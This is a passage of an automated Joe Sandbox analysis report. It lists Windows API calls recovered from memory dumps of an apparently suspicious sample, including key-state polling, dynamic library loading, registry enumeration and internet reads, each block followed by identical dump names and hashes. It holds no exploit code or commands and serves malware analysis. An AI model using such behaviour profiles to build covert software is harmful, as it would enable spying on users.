                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BABBB3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 826366716-0
                                                                                                                                        • Opcode ID: 0e5bb6208384836afd8a0c283139e8d44d6d4447950b8c381ac5a302c9388b16
                                                                                                                                        • Instruction ID: e7b81c1f3cd74199dc926338f081030ca39ca6bd71afa60a06972bd73f96bbc5
                                                                                                                                        • Opcode Fuzzy Hash: 0e5bb6208384836afd8a0c283139e8d44d6d4447950b8c381ac5a302c9388b16
                                                                                                                                        • Instruction Fuzzy Hash: C861813120C241AFD714DF14C491E2ABBE5FF85348F54899CF4A98B2A2DB31ED45CB92
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B88BCD
                                                                                                                                        • VariantClear.OLEAUT32 ref: 00B88C3E
                                                                                                                                        • VariantClear.OLEAUT32 ref: 00B88C9D
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B88D10
                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B88D3B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4136290138-0
                                                                                                                                        • Opcode ID: 09ca86df163548d1c44c0fbb07816cd7c9fbcb3aeac2be0cada91d4f2fea0ee1
                                                                                                                                        • Instruction ID: be4bf66f97f61bd95538bc2e14837c68ab6c8cc9973bf078f460c632d9f592d4
                                                                                                                                        • Opcode Fuzzy Hash: 09ca86df163548d1c44c0fbb07816cd7c9fbcb3aeac2be0cada91d4f2fea0ee1
                                                                                                                                        • Instruction Fuzzy Hash: 24516CB5A00219EFCB14DF58C894AAAB7F5FF89310B158569F905DB354EB30E911CF90
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B98BAE
                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B98BDA
                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B98C32
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B98C57
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B98C5F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2832842796-0
                                                                                                                                        • Opcode ID: 196a82d273bc2c8bccbeaf1ae0fcb8fd7528138a640f8bb33389f98680ee80d5
                                                                                                                                        • Instruction ID: a718fb9009d0e7e1577dedd4673c933f27b698f52c8d03c9614aeafe7af6f3b0
                                                                                                                                        • Opcode Fuzzy Hash: 196a82d273bc2c8bccbeaf1ae0fcb8fd7528138a640f8bb33389f98680ee80d5
                                                                                                                                        • Instruction Fuzzy Hash: E0513A35A002199FCF05DF64D881A6DBBF5FF49314F0884A8E849AB362DB35ED51CB90
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00BA8F40
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00BA8FD0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00BA8FEC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00BA9032
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00BA9052
                                                                                                                                          • Part of subcall function 00B3F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B91043,?,753CE610), ref: 00B3F6E6
                                                                                                                                          • Part of subcall function 00B3F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00B7FA64,00000000,00000000,?,?,00B91043,?,753CE610,?,00B7FA64), ref: 00B3F70D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 666041331-0
                                                                                                                                        • Opcode ID: 3356f631ceb777568390d62225feae8d8e457a3bea989f9071c54d2d15b5e8d0
                                                                                                                                        • Instruction ID: ebbfae5c9ffcbe7b0d0a4bbd1c668b0b9bbe46eac9c4c7c4d56b21b4d00891c4
                                                                                                                                        • Opcode Fuzzy Hash: 3356f631ceb777568390d62225feae8d8e457a3bea989f9071c54d2d15b5e8d0
                                                                                                                                        • Instruction Fuzzy Hash: 52512734604215DFC711DF58C4948ADBBF1FF4A314B0880E8E80AAB762DB31ED85CB90
                                                                                                                                        APIs
                                                                                                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00BB6C33
                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00BB6C4A
                                                                                                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00BB6C73
                                                                                                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00B9AB79,00000000,00000000), ref: 00BB6C98
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00BB6CC7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long$MessageSendShow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3688381893-0
                                                                                                                                        • Opcode ID: a59ccd0eb14aefc2891c0164f16e729415b1491ebcef2c81db64cfc20855e5e2
                                                                                                                                        • Instruction ID: 3e7608b9a662ebb778899c8bd7e5300b51fea3c183096faecdac385109c43e24
                                                                                                                                        • Opcode Fuzzy Hash: a59ccd0eb14aefc2891c0164f16e729415b1491ebcef2c81db64cfc20855e5e2
                                                                                                                                        • Instruction Fuzzy Hash: 69419F35A04104AFDB24CF28CC99FF97FE5EB09350F1506A8E999A72A0C7F5AD41CA90
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                        • Opcode ID: dd8366bf11fce6628f73ef01924ce02b51a9a73a40818245fedfc3fc59032acb
                                                                                                                                        • Instruction ID: b591c26f82aeb3cf4423f60f068e3534318b2d241be18d087485b6c156e61b84
                                                                                                                                        • Opcode Fuzzy Hash: dd8366bf11fce6628f73ef01924ce02b51a9a73a40818245fedfc3fc59032acb
                                                                                                                                        • Instruction Fuzzy Hash: C241C332A012109FCB24DF78C981B5EB7E5EF8A314F1545E8E915EB392DB31AD05CB80
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00B39141
                                                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 00B3915E
                                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00B39183
                                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00B3919D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4210589936-0
                                                                                                                                        • Opcode ID: b2af199439231c2f732ceaee2e348e8904b65385447cc3795bb8bf6b8c0ee2e9
                                                                                                                                        • Instruction ID: 40ba5cfb2ce51273d4a3ead2258bb80d639e05b933e19e5b057b02d4b2c044ba
                                                                                                                                        • Opcode Fuzzy Hash: b2af199439231c2f732ceaee2e348e8904b65385447cc3795bb8bf6b8c0ee2e9
                                                                                                                                        • Instruction Fuzzy Hash: D7414F31A0861ABBDF159F64C844BEEBBB4FB05320F2082A5E439B7290CB706D54CF91
                                                                                                                                        APIs
                                                                                                                                        • GetInputState.USER32 ref: 00B938CB
                                                                                                                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B93922
                                                                                                                                        • TranslateMessage.USER32(?), ref: 00B9394B
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00B93955
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B93966
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2256411358-0
                                                                                                                                        • Opcode ID: 732bb717ae7be794ae1c9d2878bb5d1a018c65be42d3b1f810f2a9c2bb8e8c93
                                                                                                                                        • Instruction ID: 25d0aef82729af29bc5dde97db7ecf3e3e3b60a9f63bad2ec0ad1ab9d75a3fed
                                                                                                                                        • Opcode Fuzzy Hash: 732bb717ae7be794ae1c9d2878bb5d1a018c65be42d3b1f810f2a9c2bb8e8c93
                                                                                                                                        • Instruction Fuzzy Hash: 01319570504341DFEF35CB359889BB63BE8EB15704F0409B9E467871A0EBF49A85CB21
                                                                                                                                        APIs
                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00B9C21E,00000000), ref: 00B9CF38
                                                                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00B9CF6F
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,00B9C21E,00000000), ref: 00B9CFB4
                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B9C21E,00000000), ref: 00B9CFC8
                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00B9C21E,00000000), ref: 00B9CFF2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3191363074-0
                                                                                                                                        • Opcode ID: 7dd47da1ba00956d247b12ccda7a36e5f601947f12848a7ee32d349869cc5cbd
                                                                                                                                        • Instruction ID: 11293f67f46c379088274ba386db8f17e82b24f9b4fe6f05a2cf13b7412460dd
                                                                                                                                        • Opcode Fuzzy Hash: 7dd47da1ba00956d247b12ccda7a36e5f601947f12848a7ee32d349869cc5cbd
                                                                                                                                        • Instruction Fuzzy Hash: 0D314C71900205AFDF20DFA5C884AABBFF9EB14350B2044BEF506D3151DB70AE489B60
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B81915
                                                                                                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 00B819C1
                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 00B819C9
                                                                                                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 00B819DA
                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B819E2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                        • Opcode ID: daaa74b084b5f3dc1b0dbd27cdfd36c9f5a81e05c2fbbbe748c85ecf4747b41c
                                                                                                                                        • Instruction ID: 4203646acdb8cd1914d502d28e849462639126a96b5ee50a96a63207eecfa057
                                                                                                                                        • Opcode Fuzzy Hash: daaa74b084b5f3dc1b0dbd27cdfd36c9f5a81e05c2fbbbe748c85ecf4747b41c
                                                                                                                                        • Instruction Fuzzy Hash: 6931E271900219EFCB00DFACCD98AEE3BB9EB04314F104765F961A72E0C7B09946CB90
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BB5745
                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BB579D
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB57AF
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB57BA
                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BB5816
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 763830540-0
                                                                                                                                        • Opcode ID: 1ac061ae7dc0c083278afa73846c39e706907215e740ad8ec057518a0d3392dd
                                                                                                                                        • Instruction ID: b4e94b17c48bfb6a5793acc6896c85c22e90d586adfac5fae2a727a3f854e04f
                                                                                                                                        • Opcode Fuzzy Hash: 1ac061ae7dc0c083278afa73846c39e706907215e740ad8ec057518a0d3392dd
                                                                                                                                        • Instruction Fuzzy Hash: A5218071904618ABDB309F65CC84BFD7BF8EB04724F108696E929AB184DBB09A85CF51
                                                                                                                                        APIs
                                                                                                                                        • IsWindow.USER32(00000000), ref: 00BA0951
                                                                                                                                        • GetForegroundWindow.USER32 ref: 00BA0968
                                                                                                                                        • GetDC.USER32(00000000), ref: 00BA09A4
                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00BA09B0
                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00BA09E8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                        • Opcode ID: b852d0d9b13a86c6ace079ebebfdd5d16690bf2cb43ec346e5b70f7b638dda17
                                                                                                                                        • Instruction ID: fa75bd09db27b9cab25119b91803926b5770412a788ae0b3a3cb44306e1fab16
                                                                                                                                        • Opcode Fuzzy Hash: b852d0d9b13a86c6ace079ebebfdd5d16690bf2cb43ec346e5b70f7b638dda17
                                                                                                                                        • Instruction Fuzzy Hash: AC218135600214AFD704EF69D895EAEBBE9EF49700F0485ACF85AA7752CB70AC04CB50
                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00B5CDC6
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B5CDE9
                                                                                                                                          • Part of subcall function 00B53820: RtlAllocateHeap.NTDLL(00000000,?,00BF1444,?,00B3FDF5,?,?,00B2A976,00000010,00BF1440,00B213FC,?,00B213C6,?,00B21129), ref: 00B53852
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B5CE0F
                                                                                                                                        • _free.LIBCMT ref: 00B5CE22
                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5CE31
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                        • Opcode ID: 6a35e1dc51749959b525947a324a4f839ae31afd4b73efa13c8aaaf8608d9b21
                                                                                                                                        • Instruction ID: 2167d77ee143f18ba893bb26129535783b1c2558a3b1e80c3a77da62e42f6cca
                                                                                                                                        • Opcode Fuzzy Hash: 6a35e1dc51749959b525947a324a4f839ae31afd4b73efa13c8aaaf8608d9b21
                                                                                                                                        • Instruction Fuzzy Hash: 7101D8726013157F23215A7A6C8AE7B6EEEDEC6BA231502E9FD05D7200DE619D0581B0
                                                                                                                                        APIs
                                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B39693
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00B396A2
                                                                                                                                        • BeginPath.GDI32(?), ref: 00B396B9
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00B396E2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3225163088-0
                                                                                                                                        • Opcode ID: d0ce8a612815b6457df55718b7a7b140a8ad15e6dd90b8e26bf208a53d37083b
                                                                                                                                        • Instruction ID: 9436cb2667e2214c8b024cf05b7089cd3877ebaff01bebfaaa1a5db87c9f6f5c
                                                                                                                                        • Opcode Fuzzy Hash: d0ce8a612815b6457df55718b7a7b140a8ad15e6dd90b8e26bf208a53d37083b
                                                                                                                                        • Instruction Fuzzy Hash: 91213D70802205EBDB11DF6DDD557B93BA8FB50355F208A56F414A71A0DBF05892CFE4
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
